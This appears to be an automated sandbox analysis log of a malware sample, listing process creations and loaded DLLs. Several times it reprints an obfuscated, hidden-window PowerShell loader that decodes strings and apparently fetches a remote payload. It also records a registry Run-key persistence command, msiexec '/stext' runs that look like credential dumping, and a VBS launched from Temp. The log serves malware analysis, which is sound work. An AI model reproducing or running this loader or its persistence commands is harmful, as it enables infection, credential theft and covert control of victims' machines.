,kogBlokeRecolNonhsK lkeBa,p. 
.hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. 
.hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP im
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. 
.hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbagJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: appresolver.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winmm.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rstrtmgr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windowscodecs.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
